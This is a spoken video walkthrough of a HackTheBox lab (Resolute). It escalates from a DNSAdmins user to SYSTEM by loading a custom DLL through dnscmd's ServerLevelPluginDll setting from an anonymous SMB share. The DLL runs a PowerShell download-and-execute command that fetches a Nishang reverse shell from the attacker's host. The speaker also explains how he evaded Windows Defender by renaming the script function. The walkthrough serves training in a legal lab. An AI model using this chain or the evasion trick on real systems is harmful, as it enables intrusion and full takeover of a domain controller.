Hey YouTube, what's going on? I'm Rocket, and this is part 5 of my video walkthrough for Resolute on HackTheBox. So in this video, I will be escalating my privileges from the Ryan user to system. If you're curious how we ended up getting to the Ryan user, you can go check out part 4 in the link in the video description below. Alright, so if we go back to the research for how we can escalate from a domain, from a DNS admin to system, we can check this out right here, and we need to create a DLL that we are going to inject into the DNS service. This literature calls it DLL injection, but really to me it's just loading, all it's doing is it's just loading a DLL and then it's just executing that code as soon as the DLL attaches to the process. So without further ado, let's go build that DLL. Oh, on a side note, you can also use MSF Venom to generate a DLL that will give you an interpreter shell, but I think doing it manually is a bit more exciting, so that's what we'll be doing in this video. Alright, so I'm going to switch over to a Windows machine right here, and if you don't have Visual Studio installed, you can go download it. Visual Studio. And make sure to get the C++ for Windows 10 framework. So right here I'm just going to create a new project. And you want to search for a C++ DLL, which is a dynamic link library. So we'll take this, we'll use that. I'm going to call it Resolute DLL. Resolute DLL privesc. Let's create. Alright, so this is pretty simple. Visual Studio does generate some bootstrap code for us to work with. The part that we care about is as soon as the DNS service is going to load our DLL, we want to get remote code execution, which will execute as system. So in this case here, it says DLL process attached. So here we're going to call system, and then put some system command in here. And we'll say PowerShell, because we know PowerShell is installed on the box that we're attacking. We'll say command. And for this command, I want to get a reverse shell. I tried adding a backdoor administrator user. That didn't work for me. If it worked for you, let me know how you did it in the comments below. That'd be awesome. But for the sake of this video, I'm going to be using Nishang to give a PowerShell reverse shell. So we'll just say PowerShell invoke expression, so IEX, new object, and then system.net.web client, and we'll download a string. And we are going to be downloading the reverse shell from our Kali machine. So Kali machine is going to be on, well, I'm actually going to take my VMware IP address here because I want to show you something. So if I go IPA, I'm going to test this locally in my VMware subnet. So take that. So 254.130. Okay. Port 8000 because that's where I host my Python HTTP listener. And we'll call it a rocket reverse shell.ps1. So to recap, I'm just invoking PowerShell to download my reverse shell script, and that's going to load it into the PowerShell memory. And then the IX stands for invoke expression, so it's going to execute that script. Perfect. So let's fix this error right here. You can fix this this compiler error by including the standard library. So we'll say include stdlib.h. And we do want to build this for a 64-bit architecture. You can go Shift-Control-B to build. And there we have it. So let's test this out. Let's see if this works. So I'm going to test this DLL using the run DLL32 command. So I'm going to open up a PowerShell command prompt. I'm going to go to the directory where the DLL was built, and then I'm going to run DLL32, take the DLL, and we're just going to invoke main. So usually the point of using a DLL is so that you can load external functions, kind of like as plugins or modules. But because we're just trying to get remote code execution and just get a reverse shell, we don't need to be too concerned about that. So I'm just gonna invoke main, and it should call my command right here. But before I do that, I do need to have a web service listening, as well as the PowerShell script. So let's copy. Oh, by the way, the PowerShell script that I'm downloading is from the Nishang framework. So you can just look for Nishang on Google and just clone this repository. Great. All right. So I'm going to copy, put it tools, Nishang, shells, invoke TCP, invoke PowerShell, TCP, .ps1. I'm going to call it rocket reverse shell.ps1. The next thing we need to do is edit this file, because it is just the function declaration. So if we recall, going back to our command here, we're downloading the script and we're executing it. But just executing this alone won't do anything, because it's a function declaration. So what we need to do is copy this line right here and paste it at the bottom, just as though we were actually calling invoke PowerShell TCP. So my Kali machine, the IP on my Kali machine is ETH0 is in the VMware 130 subnet. So, sorry, it's in the 192.168 subnet. So we'll say IP address 130, and I like to put my netcat listener on port 2001. Cool. So here I'm gonna load up the Python HTTP server. So Python 3-m for module http.server. We'll be listening on port 8000. Next, we need to start our netcat listener. So I'm gonna say rl wrap ncat nvlp 2001. So I'm running netcat with rl wrap because this way I can kind of toggle back and forth in command history and move my cursor left and right, which is very useful. Oh, I also get recursive history search with Control-R, so very handy. All right, now let's see if we can get this reverse shell to spin up. So we've already compiled the DLL, and now we're just going to go execute it. So run DLL32, take the DLL, and we'll just invoke main, which will basically is the same thing as triggering this right here. So as soon it's going to attach to our process and spawn a PowerShell shell. Let's go. Execute. So we have a command prompt, and something terribly wrong happened right there. But we got a hit. So something might have went wrong here. And it's good to test these things locally, because whenever you're working, whenever you're trying to kind of make some third-party software load your DLL and it behaves weirdly, you want to eliminate all possibilities that could make it go wrong. And the easiest way to isolate those problems is by first testing locally in a controlled network or environment. So what happened there? Let's troubleshoot. The message box disappeared too quickly for us to see, so we can kind of slow that down with a sleep command. So I'm just going to put a semicolon so I can so I can execute 2 command calls within the same system call. So I'm going to say sleep 20. Control Shift B to rebuild. And let's run this again. So this script contains malicious content and has been blocked by your antivirus software. So that's a problem. And because the Nishang framework is getting pretty well known, Windows Defender is actively maintained and it's catching up to these sort of off-the-shelf exploits, off-the-shelf attacks. And we might need to figure out how to get around this if Windows Defender is installed on Resolute. So let's go see if Windows Defender is a legitimate concern we need to worry about. So I'll go back to our WinRM session. I'm going to run get service. If you recall from a previous video, I was not able to run the get service command as the Melanie user because I did not have sufficient permissions to. But as a Ryan user, we can see that this command does indeed execute and Windows Defender is also running. So we will have to deal with antivirus. Right, so how do we evade this? Well, what we can do, I'm just gonna close this, is we can make some changes to this PowerShell script so that this script kind of looks like it was less off the shelf per se. So we have the function, it's called invoke PowerShell TCP. I just like to rename this. So I'm just gonna call it something like pwn. Change it everywhere, of course, because it's still the function call, and also get rid of the comments. Great. So now we're calling the pwn function. Let's see if that works for a modern version of Windows Defender. Start our netcat listener. And let's run this malicious command once again. So that looks promising. Let's check our netcat shell. Looks like we got a reverse shell. We got a connection from our builder host. Go, who am I? I am the Rocket user. So, okay, we verified that modifying the function name and removing the comments from that PowerShell script is sufficient to bypass antivirus evasion. Cool. So let's get out of this right here. All right, now the thing is we should test this on the machine that we're attacking. So the first thing we need to do is go and change the IP address here to the HackTheBox VPN IP. So that's 10.10.14.48. And we probably don't need to sleep. Save, Control Shift B, build. Cannot open file. That is because there's probably a handle open on it right now. So let's try again. Okay, so we rebuilt the DLL. Before we go and try to get the DNS service to load this DLL, I think it's worth just running this PowerShell command alone to see if we're going to get hit by antivirus. So let's take that. Go back to our WinRM session. Oh, of course we need to be listening. Paste this. See if it works. So we got some activity. We do. Well, we did download the script, but it didn't work. So I must have juked something. I think I forgot to change the IP address down here, which yeah, I did. So let's change this to the HackTheBox IP as well, because that's where our netcat listener is on. 10.10.14.48, port 2001. And we close that. All right, let's try this again. And we have a reverse shell. Who am I? Okay, a little bit of a glitch there, but the pwn function definitely worked. So we can say that this that we have successfully evaded antivirus. So let's exit here. Control C, Control L, and start up our Netcat listener again. All right. Now we need to transfer this DLL from our Windows host to our Kali host, and I'm just going to do that with VMware tools. Oops. So I'm going to run Explorer here, and just kind of like drag and drop it to my host computer's desktop, and then move the DLL from my host computer desktop over to my Kali machine right here. So we got that. I'm going to copy this to this directory here. We're in the privs directory, and yeah, I'm going to copy the Resolute DLL privs to a shared directory, because what's going to happen is this is the command that we are going to be running to get the DNS service to load the DLL. It's going to be something that looks like this, and we can see that for this to work, according to this research, we need to go download it over SMB, over a remote share, and I don't see any sort of credentials being passed here, so I'm just going to create an anonymous SMB share that anyone can access, just so this DLL can be downloaded this way. So without further ado, let's copy the DLL over to a shared directory. So it's there, and now I need to start the SMB server there so it can actually get downloaded. So I'm going to say SMB server .py. I'm going to use impact as SMB server. Share name, we're going to call it Rocket. The share path is going to be shared. We're not going to put any authentication on it, but we will be using SMB to support. And you have to run this as the root user, because SMB listens on port 445. So sudo SMB server py, enter the password, and there we go. All right. So now that's going. What we have to do here is first we need to stop the DNS service. And once we stop the DNS service, we can restart it. But during that process, like every time the DNS service restarts, it looks in the registry to see where it should load any sort of like server plugins. And that's where this sort of like command here comes in handy. So let's just copy this right here, and we'll just modify it a bit to work for our case. So right here, paste that. So DNS CMD. Well, actually, before we do that, it's always a good test to see if we can even run the DNS CMD. I'm sure we can, but good sanity check. Okay, it works. All right, copy this again. Paste. So DNS CMD, it looks like it's taking some sort of domain name. A domain name that should work is you can just type hostname. You can find the hostname's domain name, which resolves to Resolute. So we can say DNS CMD Resolute config, and then server level plugin DLL, and we're going to load a malicious plugin from our Kali machine. And instead of the tools directory, we want to go into the Rocket directory. And of course, we do need to get the DLL. ls shared, which is this thing right here. So go back to our Windows remoting session, paste that. So the registry property server level plugin DLL has successfully been reset. All right. Now we're gonna stop the service, and then we're gonna start it. So sc.exe, we'll say stop DNS. We can also go get service to verify that DNS. Huh. I was expecting that to say stopped. Stop DNS. Oh, it's pending. Okay, well. Okay, stop now. Okay, so now let's start it. So let's go sc.exe start DNS. Start pending. As soon as it starts, we should get a result here. Huh. Nothing, eh? Let's try that again. Oh, we didn't even authenticate. We didn't even get to the SMB. Oh, did I put the wrong IP address? I hope not. IPA 1448. 1448. Okay, so we reset that. Let's stop the DNS service. Stop pending. Let's just try starting it to be quick. And we got some activity. Looks like looks like the Resolute server has accessed our SMB share. That's good news. It did download the reverse shell, and we are system. All right, now let's see if we can go to the administrators directory. So C users, administrator, go to the desktop, and there is the flag. Perfect. So that concludes this video. I hope you learned something, and I will see you next time.